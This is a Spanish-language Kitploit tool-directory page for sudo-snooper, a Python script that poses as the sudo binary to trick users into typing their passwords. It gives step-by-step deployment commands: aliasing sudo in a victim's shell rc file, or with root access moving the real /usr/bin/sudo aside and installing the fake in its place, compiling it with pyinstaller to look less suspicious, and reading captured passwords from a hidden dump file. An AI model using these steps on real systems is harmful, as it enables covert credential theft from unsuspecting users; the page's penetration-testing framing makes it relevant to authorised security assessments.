Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
sudo-snooper — Script en Python que actúa como el binario sudo original para engañar a los usuarios y hacer que introduzcan sus contraseñas | Kitploit
Herramientas/GitHubGitHub/xorond/sudo-snooper
Herramientas de PhishingAtaques de ContraseñasPruebas de PenetraciónIngeniería Social
GitHubxorond/sudo-snooper

sudo-snooper

Script en Python que actúa como el binario sudo original para engañar a los usuarios y hacer que introduzcan sus contraseñas

Ver Repositorio
7034hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

sudo-snooper

sudo-snooper actúa como el binario sudo original para engañar a los usuarios y hacer que introduzcan sus contraseñas.

Mostrará un prompt falso similar al original para que el usuario introduzca su contraseña sudo.

Esto puede ser útil en pruebas de penetración o evaluaciones de seguridad para comprobar el conocimiento del usuario.

Pasos de instalación

Opción 1 - Crear un alias del comando sudo (más fácil pero algo más perceptible)

Esta opción es más fácil de realizar y más portable, aunque puede ser más perceptible para usuarios cuidadosos.

Edite el archivo .rc del shell que está usando el usuario (puede ser .bashrc, .zshrc, etc.) y añada lo siguiente:

root@kitploit:~
alias sudo='python3 /path/to/sudo-snooper.py'

Asegúrese de que sudo-snooper.py tenga los permisos correctos.

Opción 2 - Instalar en lugar del sudo real (más difícil pero menos obvio)

Necesita acceso root para esta opción de instalación

Esto solo es útil si ya tiene acceso root pero no puede descifrar los hashes de /etc/shadow por alguna razón. Básicamente puede obtener la contraseña del usuario mediante phishing.

  • Mueva el binario sudo original a otro nombre
root@kitploit:~
# mv /usr/bin/sudo /usr/bin/somename
  • Cambie los parámetros del archivo según su preferencia

Cambie estos en sudo-snooper.py:

root@kitploit:~
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • Instale el archivo python en /usr/bin/sudo (o donde estuviera sudo antes)
root@kitploit:~
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • Asigne los permisos necesarios al archivo python

    Puede ser más creativo aquí y crear un archivo ejecutable no legible para los usuarios, pero no voy a entrar en eso. Consulte algunas de las respuestas aquí para más información.

NOTA: Una forma un poco más convincente de instalar esto es compilarlo usando pyinstaller para que no aparezca como un archivo python cuando se ejecute file /usr/bin/sudo.

Para hacerlo en Archlinux: pyinstaller --onefile sudo-snooper.py funcionará. Sin embargo, tenga en cuenta que una vez compilado, no podrá cambiar los parámetros en el binario compilado.

Uso:

Una vez instalado, sudo-snooper se puede invocar igual que el sudo normal.

Por ejemplo, ejecutar

root@kitploit:~
sudo vim /etc/resolv.conf

resultará en que se llame a sudo-snooper (asumiendo que esté correctamente instalado).

Pedirá la contraseña del usuario y luego ejecutará el comando redirigiendo al binario sudo real si la contraseña es correcta.

Luego podrá recuperar la contraseña del usuario leyendo el archivo de volcado en la configuración.

TODO:

  • manejar cuando el usuario introduce una contraseña incorrecta
Descargar herramienta